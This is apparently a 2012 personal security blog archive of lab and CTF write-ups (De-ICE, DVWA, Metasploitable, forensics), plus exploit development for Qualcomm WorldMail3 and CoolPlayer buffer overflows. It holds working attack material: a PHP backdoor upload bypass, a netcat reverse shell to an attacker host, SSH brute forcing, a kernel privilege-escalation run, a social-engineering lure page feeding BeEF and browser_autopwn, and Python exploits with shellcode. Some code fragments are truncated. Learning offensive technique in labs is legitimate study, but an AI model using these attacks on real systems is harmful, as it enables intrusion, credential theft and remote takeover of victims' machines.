Wednesday, 14 November 2012

Slax De-ICE v2.100 Solution

Posted by at 07:46

#Information Gathering

Scaning using Netdiscover :

Scanning with Nmap :
result for information gathering:
root@bt:~# nmap -sS -A

Starting Nmap 6.01 ( ) at 2012-11-12 04:49 EST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 992 filtered ports
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:; OS: Unix

1 1.13 ms

In address I have found some credential information about developer and marketer.

# Service Enumeration

20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357

# Vulnerability Assesment

 1.    FTP Login Anonymous allowed
 2.    OpenSSH Denial of Service
 3.    Directory Listing

# Exploitation

First, I'm interesting with FTP login but I dont't get anything in the ftp.

Second, I have try on openSSH with vulnerable DOS. Try using this exploit and the ssh service temporary down. /pentest/exploits/exploitdb# platforms/multiple/dos/

Third, I'm trying to directory listing on http service. this part separated into 3 step :
  1. Create userlisting from available info in their web site.

  2. Create file listing for common user in linux syste,
  3. Combination userlisting and filelisting with dirb, dirb available in backtrack.

root@bt:/pentest/web/dirb# ./dirb /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

Dirb usage:

root@bt:/pentest/web/dirb# ./dirb /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

DIRB v2.03
By The Dark Raver

START_TIME: Mon Nov 12 22:26:48 2012
WORDLIST_FILES: /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt
OPTION: Printing LOCATION header
OPTION: Not Stoping on warning messages



---- Scanning URL: ----
(FOUND: 200 [Ok] - Size: 579)
(FOUND: 400 [Bad Request] - Size: 313)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
(FOUND: 200 [Ok] - Size: 570)
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
(FOUND: 200 [Ok] - Size: 570)
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
(FOUND: 200 [Ok] - Size: 566)
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
(FOUND: 200 [Ok] - Size: 816)
(FOUND: 200 [Ok] - Size: 566)


From the dirb, you can see ~pirrip/.ssh/ listing. Then open it from your browser and download the id_rsa and Two files is ssh key authentication. Now connect to the machine target with ssh.

# ssh -i id_rsa pirrip@

Well, we have connected into target machine. But we don't know what is the password of pirrip.

Finally I'm using grep to find string with password.

# grep -r "Password" /

For the long time, I got the password of pirrip -> 0l1v3rtw1st

Friday, 9 November 2012

Slax v.110

Posted by at 02:56
# Information Gathering

In this part, I will IG the target using Nmap with the command :
# nmap -sS -A
and return the result ->

# Service Enumeration

FTP (vsftpd)
CUPS Print

# Vulnerability Assesment

From the Information Gathering and Service Enumeration result, we know that FTP are allowed the user to login anonymously. May be we can get some interesting file inside.

Before, I have trial to get each file on it. But I'm intersting with core file.
Download it and open it, I'm opened it using cat, look scream...
Try to open it with 'strings' command, w00t we got the string of shadow file.
Now separated the shadow string and the other, copy the shadow string and copy it into text editor.

# Exploitation

Now time to crack the shadow, I used John THe Ripper to do this job. And finally, we got it. Enjoy!

Saturday, 3 November 2012

Network Forensic Puzzle #1

Posted by at 07:39
Yesterday I was learn about Network Forensic, and my case is captured paket using Wireshark. You can download the capture file here.

After download the capture. We can open it wid DD and then capture it.
For short tutor we can use the dumb way. In this case I will pulling data named "recovery.docx" So, we need to know what is the header / magic number of docx files.
If you don't know about magic number, you can browse it on Google with keyword magic number programming. The magic number of docx file is 504B. Ok, you got the key now.

Now I will use tcpflow to split the each packet on the capture file.

# tcpflow -r evidence.pcap

and some split is For short tuts, I have select the splited file that contain receipe.docx

The captured file is contains hexa. With DD you can see the hexa of captured file. I used the dumb trick method to pull up the captured file. First I will convert the file into raw.

# xdd -ps > raw.txt

Open the raw.txt with text editor like gEdit or Kate. Then search word 504B, at the first time of returned result. Please remove the line/text before 504B, and then save it.

Back to DD, and convert the raw.txt into binary.

#xdd -r -ps raw.txt > receipe.docx

Finally, open the receipe.docx with Word Processor like MS Office or Libre Office.

Memory Forensic

Posted by at 01:10
Today I was learn about Memory Forensic. My target is windows xp, before I have been dump memory from windows xp using AccessData FTK. After dumping memory, I copied the dump memory into backtrack, and then open it using Volatile.
# ./ -f /path/of/memorydump.mem imageinfo
after run the command above, you will see some information about memory info.

Using volatile you can see proccess,networking, and much more.
The image above will show some feature of Volatile tool.

I think we can dump password for windows machine using volatile. You can use hashdump and havelist.

Images below show me how many connections in my windows machine. We can see that someone with ip address connected to my machine with port 6660 and 4444 in the same PID. May be someone was attack my machine using vulnerability on BigAnt and connect back with opening port 4444.

In this case, we can see history of cmd command typed by user before memory dumped using FTK.

Monday, 29 October 2012

How to get pwnOS IP Address

Posted by at 17:30
Yesterday, I was learn about pwnOS. The vulnerable operating system for penetration testing lab. Then I trying to run the pwnOS in VMware, after booting and login prompt appear any question in my mind. What is the IP address on pwnOS?

Trying to scan from backtrack machine using nmap, but nothing found. Then I try to open pwnOS using virtual box, and then scaning again using nmap and finally I got it. From the problem before, I indicating that VMware doesn't giving IP address on PWNOS before we login into pwnOS system.
But in virtual box, the IP will be given before we login into pwnOS.

So, the conclusion is :

If we are using VM Ware, we need to login into pwnOS system to get the IP address, but
If we are using VirtualBox, we don't need login to get IP address.

Friday, 26 October 2012

Linux Tools for Digital Forensic

Posted by at 20:04
Here is common tools are used for digital forensic in Linux,

# DD

The DD tool is used for clone the device like hard-drive. DD will clone the device look like the original device. If the size of device is 500GB so the result of clone is 500GB too.
The command for DD clone :
# dd if=/dev/sda of=/tmp/forensic
if : input file
of: output file


Fdisk commonly used for hard drive partition. In digital forensic, you can use fdisk for craving information in the device.
# fdisk -ul /path/of/clonning/device


MD5SUM usually used for getting hash of device or file. With md5sum, you can keep the integrity of your digital evidence.
The command for md5sum :
# md5sum file_or_device


XDD used for getting the byte offset. Using XDD is easily to get the offset of file.
The command is :
# xxd clone_images

Introduction of Computer Forensic

Posted by at 19:52

# What is Computer Forensic ?

Definition of Computer Forensic is a proccess to finding, searching, analysis dam collecting the evidence from computer system with the standard forensic and documentation for legal evidence in the court.

# What is Unallocated Space ?

Unallocated Space usually called as "Free Space", is a logical space on hard drive that the operating system. The space not be used by the operating system before formated, the opposite of Unallocated Space commonly called as Allocated Space. The Allocated space is used by operating system for write the data or file.

# What is Slack Space ?

The Slack Space refers are not fully used by the current allocated file and which may be contain data from a previously deleted file. For detail, please see the images below :

Monday, 22 October 2012

Hacking DVWA and got the ROOT

Posted by at 16:18
Hello All, today I was learn about DVWA. And I want to hack DVWA until got the root. I'm using fitur upload with high security level. Before I have prepared php backdoor that generated using Weevly.

# Create Backdoor with Weevely

Goto terminal, type :
cd /pentest/web/backdoors/weevely

Create backdoor with this command :
./ generate secret cobasaja.php
See the picture below for detail,

# Upload the Backdoor and Bypass DVWA protection with DVWA

Upload the backdoor which has been created using Weevly.
You will see that the upload failed, ok we can bypass them using BurpSuite.
Open your Burp Suite, and make sure intercept is on

Open your browser, and set proxy into burp suite.
Back to DVWA and re-upload the backdoor. Buprsuite will tamper it.
Edit your filename with add .jpg extension.
Next press forward button.

Horray, the backdoor upload successfully...
Now connect your backdoor with our machine, type this command :
./ secret
OK, now your machine connected with backdoor. 


Now, I will search available user on target machine.
cat /etc/passwd

Yuhu we got user named msfadmin
I will crack this user with medusa
medusa -h -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh
* -h : hostname
-u username
-P path of wordlist
-e options password, ns for blank password and username same as password
-M module

Haha, I got password for username msfadmin. "msfadmin" as password for msfadmin

What happened if brute force failed? Huh, we must try to do local exploit. I will use udev exploit for linux kernel. You can download the kernel exploit here

After download the kernel, we need to compile it.
gcc 8572.c -o udev
Now, create script to make target machine connect to our machine with netcat using root access.
echo '#!/bin/bash' > /tmp/run
echo '/bin/netcat -e /bin/bash 4444' >> /tmp/run
* please note that is our ip (attacker)

Back to our machine, make our system listen to port 4444
nc -lvp 4444

Check the PID of udev using following command,
cat /proc/net/netlink
 You see that the PID is 2441,  We will need this PID

Now Back to our exploit, run the compiled exploit followed with the PID
./udev 2441

Goto our netcat, and type id and whoami, you will see that you are got the root

Friday, 19 October 2012

Social Engineering + BeEF + Metasploit, finally pwned

Posted by at 11:58
Heiyo, today we will learn about pwned victim from browser. My scenario is :

  1. Make user visit our page, with SocialEngineering
  2. Setup BeEF
  3. Setup Metasploit browser_autopwn
  4. Play and Pwned
Ok, lets doing

#1. Social Engineering

Social Engineering with the best plan will result the best thing. I have plan to make link to the target. Of course the link must create interest. In this case I will create page with contain Ayana images (JKT48 personel). She is a beauty girl, so the target victim is Male of course. Hehe
Prepare the Ayana images, named cantik.jpg
Lets create the page with code below :
<script src=""></script> <!-- file JS from BeEF -->
<img src="cantik.jpg" />
Save as this file with named index.html
Place the file into this directory /var/www/ayana.jpg/
* is our ip address (attacker machine)
* ayana.jpg is directory, its to make the uri look a like addressed to images file.

Run your apache service, to make it work.

#2. Setup BeEF

Run the BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEF
Open the panel of BeEF using your browser here
Now, give the target address
You can use your favorite technique to gives the link, may be you can say that "Hei bro, look the beautiful girl here"
Back into BeEF panel to monitor your target.

Here, my target running Windows XP SP3 with IE 8 installed.

#3. Setup Metasploit browser_autopwn

Before I have read about browser_autopwn on metasploit (here), so I have idea to do that on my scenario.
Open msfconsole, then type :
msf > use auxiliary/server/browser_autopwn
Show the options for this auxiliary, type :
msf  auxiliary(browser_autopwn) > show options
set the LHOST with our IP address (attacker machine), type:
msf  auxiliary(browser_autopwn) > set LHOST
Run the auxiliary, type :
msf  auxiliary(browser_autopwn) > run
Wait until you see that
At this point, we need to notes the exploit address.
* is our ip (attacker machine)

#4. Lets play the game

Ok, the resume of scenarios is :
- Give the target some of url with contain images.
When vitctim access this page, he/she will see it :

- After that, back into BeEF panel and see what happens on that
The attacker was connected to BeEF with IE 8. Now redirect the victim into metasploit. See the image below for detail.

As we can see that the metasploit was successfully gaining access into windows system.

 Now, check the session on metasploit with command :
sessions -l
Connect to windows using meterpreter. Type :
sessions -i 2
* 2 is id of sessions on metasploit

Wednesday, 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by at 01:00
After posting about pentest on Metasploitable v.2 (here),  I will continue to attack again on machine target using result from Nmap scanning before. You can see the available service here.
Ok, in this post the target service is Unreal IRCd.

  1. Run the Metasploit
  2. Search exploit for Unreal IRCd using metasploit
    # msf > search unreal irc
  3. It will returned :
    exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD Backdoor Command Execution
  4. Now, use the exploit above
    # msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
  5. See what the available configuration for this exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > show options
    It will returned,
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  6667             yes       The target port
    Exploit target:
    Id  Name
    --  ----
    0   Automatic Target
  6. Set the RHOST,
    # msf  exploit(unreal_ircd_3281_backdoor) > set RHOST
  7. Show the available payloads,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    ompatible Payloads
       Name                     Disclosure Date  Rank    Description
       ----                     ---------------  ----    -----------
       cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/generic                          normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
       cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)
  8. I will use cmd/unix/reverse for telnet connection,
    # msf  exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
  9. See the configuration for the payload,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST   yes       The target address
       RPORT  6667             yes       The target port
    Payload options (cmd/unix/reverse):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   Automatic Target
  10. Set the LHOST with our IP Address
    # msf  exploit(unreal_ircd_3281_backdoor) > set LHOST
  11. Now, launch the exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > exploit
  12. OK, wait for a minute and you will bringing into linux shell... type uname -a for test
    # uname -a

Metasploitable 2 has been PWNED with Metasploit

Posted by at 00:09
Hi All, today I want to share about how to pwned Metasploitable v2.
You can download metasploitable v2 here
After installing Metasploitable 2 on Virtual machine, We will start to the step of pentest.

  1. Scan the running service on target machine
  2. Here, I'm using Nmap to do this job
    # nmap -sV -A
  3. I got this information about the services
    Starting Nmap 6.01 ( ) at 2012-10-17 17:18 EDT
    Nmap scan report for
    Host is up (0.00097s latency).
    Not shown: 977 closed ports
    21/tcp open ftp vsftpd 2.3.4
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp open telnet Linux telnetd
    25/tcp open smtp Postfix smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
    139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    512/tcp open exec netkit-rsh rexecd
    513/tcp open login?
    514/tcp open shell?
    1099/tcp open rmiregistry GNU Classpath grmiregistry
    1524/tcp open ingreslock?
    2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
    2121/tcp open ftp ProFTPD 1.3.1
    3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
    5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open vnc VNC (protocol 3.3)
    6000/tcp open X11 (access denied)
    6667/tcp open irc Unreal ircd
    8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
    8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  4. Ok, to many service. I will try VSFTPd 2.3.4
  5. Run your Metasploit, and search the exploit for VSFTPd 2.3.4
  6. Use the search command on Metasploit
    # msf> search vsftpd
  7. It will return
    exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
  8. Use the exploit above,
    # msf> use exploit/unix/ftp/vsftpd_234_backdoor
  9. Setting the exploit,
    # msf  exploit(vsftpd_234_backdoor) > show options
  10. Set the RHOST with the IP Target
    # msf  exploit(vsftpd_234_backdoor) > set RHOST
  11. Show the available PAYLOAD,
    # msf  exploit(vsftpd_234_backdoor) > show payloads
  12. Select the Payload,
    # msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
  13. Run the Exploit command,
    # msf  exploit(vsftpd_234_backdoor) > exploit
  14. Wait and you will bring into linux shell. Type uname -a and you will see the kernel of metasploitalbe 2.

Read my next post, Metasploitable 2 pwned with Metasploit - Part 2

Friday, 12 October 2012


Posted by at 06:52
When learning about bypass SafeSEH protection, often meet with command POP POP RETN.
whether is POP POP RETN ?
based my knowledge, this commands are the popular method to bypass safeseh. Commonly, memory is contain memory 32bit or 4byte virtual file. POP command first will remove the value of the top from virtual file into other memory register, and then the second POP command will remove the value of the second virtual file into other memory, and finally the RETN command will be the first stack. So the system will be execute command based on memory address on RETN.

May be you will more understand about POP POP RETN after see the image above

Qualcom WorldMail3 Buffer Overflow

Posted by at 06:41
Today I want to learn about buffer overflow on Qualcom Worldmail3.
First, I make fuzzer using vulnerable character and command :
a001 LIST }
My fuzzer look like this :

import socket
buffer = "\x41" * 800
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

Open Ollydbg and attach IMAP4.exe
Application crash? If yes, now goto View->SEH Cain, and press Shift+F9. EIP has been overwrite.
Now time for getting offset, in this case I have found that the offset is 774. So, modify the fuzzer again. Btw you need to restart your Windows.

import socket
buffer = "\x41" * 774
buffer += "\xcc" * 4
buffer += "\x41" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

Run the Ollydbg and attach IMAP4, then re-run the fuzzer.
What you see? EIP was overwrite with CCCCCC, it's mean that the offset is accurate.
Check the module which not protected by safeseh, in this case the mailcmn.dll is not protected.
Now search the POP POP RETN opcode, please note that the address is not contain 00,0a and 0d.
Now edit the fuzzer for setup the payload :

import socket
import os
import time
shellcode = "w00tw00t"
shellcode += ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") #bad char 00,0a,0d,
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
buffer = "\x90" * (738-len(shellcode))
buffer += shellcode
buffer += "\x90" * 32
buffer += "\xeb\x06\x90\x90"
buffer += "\x4e\x3b\x01\x10"
buffer +=  egghunter
buffer += "\x90" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "Waiting for 10 sec ..."
time.sleep(10) #waiting until egghunter proses done, please be patient
print "Try to connect ..."
os.system("telnet 4444")

OK, run again the fuzzer. and I got this

Monday, 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted by at 12:54
Today I learn buffer overflow CoolPlayer+ Portable 2.19.2. This is a Audio Player for windows. I need to prepare some tools for exploitation.

  1. Windows XP SP 3 English
  2. Ollydbg
  3. Metasploit
  4. Geany text editor
First, I will create fuzzer. Step by step the fuzzer from 100 until 1000. When fuzzer size 100 byte, the application crash but, the stack space for payload is to small. So I trying to place 1000 fuzzer, and the result is the application crash too and the stack space is enough.


## Information Security Shinobi Camp              #
##                       #
##                    #

# How to use
# playme.m3u "\x41" 1000

import sys
filename = sys.argv[1]
my_args  = sys.argv[2]
long_args= int(sys.argv[3])

sploit = my_args * long_args

fopen = open(filename,'w')
Run the fuzzer, open the playlist using Cool Player and look at the EIP. The EIP was overwriten.
After making EIP overwrite, I need to know where the EIP overwriten exactly.
Use metasploit pattern_create to check it,
./pattern_create.rb 1000

edit the fuzzer

## Information Security Shinobi Camp              #
##                       #
##                    #
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')

Now, re-run the fuzzer. Reopen the ollydbg and attach the Coolplayer. Load the playme.m3u again.
Look at the EIP, copy the value and check using pattern_offset of metasploit tools
./pattern_offset.rb 30684139
and return value 209. Now back into fuzzer and edit look like this :

## Information Security Shinobi Camp              #
##                       #
##                    #
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')

Run the fuzzer, restart Olly and Coolplayer. Then load playme.m3u again. Make sure that the EIP was overwritten with DEADBEEF.
Then we need module that having opcode JMP ESP.
Click View->Executable Module, double click SHELL32.dll. Search the JMP ESP, Click right->Search For->Command, insert JMP ESP. Please note the address of JMP ESP.

Back into CPU right block, Click in the ESP and Right click Follow in Dump.
We can see that the space for payload is enough for Execute Command Payload. So I will use it.
Generate payload using metasploit and the bad characters is 00,0a,0d
Edit the fuzzer again :

junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"

sploit = junk

fopen = open("playme.m3u",'w')

Rerun the fuzzer, open coolplayer and load the playme.m3u again. Look the Coolplayer was crash and calculator appear.

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template